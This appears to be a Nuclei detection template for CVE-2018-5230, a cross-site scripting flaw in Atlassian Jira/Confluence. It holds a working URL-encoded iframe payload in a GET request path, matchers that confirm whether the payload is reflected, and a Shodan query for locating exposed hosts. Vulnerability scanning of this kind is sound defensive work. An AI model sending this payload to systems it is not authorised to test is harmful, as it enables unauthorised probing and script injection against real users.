56 lines
2.2 KiB
YAML
56 lines
2.2 KiB
YAML
id: CVE-2018-5230
|
|
|
|
info:
|
|
name: Atlassian Jira Confluence - Cross-Site Scripting
|
|
author: madrobot
|
|
severity: medium
|
|
description: |
|
|
Atlassian Jira Confluence before version 7.6.6, from version 7.7.0 before version 7.7.4, from version 7.8.0 before version 7.8.4, and from version 7.9.0 before version 7.9.2, allows remote attackers to inject arbitrary HTML or JavaScript via a cross-site scripting vulnerability in the error message of custom fields when an invalid value is specified.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, data theft, or other malicious activities.
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by Atlassian to mitigate this vulnerability.
|
|
reference:
|
|
- https://jira.atlassian.com/browse/JRASERVER-67289
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-5230
|
|
- https://github.com/sushantdhopat/JIRA_testing
|
|
- https://github.com/Elsfa7-110/kenzer-templates
|
|
- https://github.com/Faizee-Asad/JIRA-Vulnerabilities
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2018-5230
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00153
|
|
epss-percentile: 0.5091
|
|
cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: atlassian
|
|
product: jira
|
|
shodan-query: http.component:"Atlassian Confluence"
|
|
tags: cve,cve2018,atlassian,confluence,xss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '<iframe src="javascript:alert(document.domain)">'
|
|
- 'confluence'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'text/html'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100b138fbd3bbd489f08bd33858718f0442f6505a373448138b9dcab407fc9c6f0d02200ef70b95e53275733e292c2ca0ea7e64bd6524a631001790a986ac2e9c23ef93:922c64590222798bb761d5b6d8e72950 |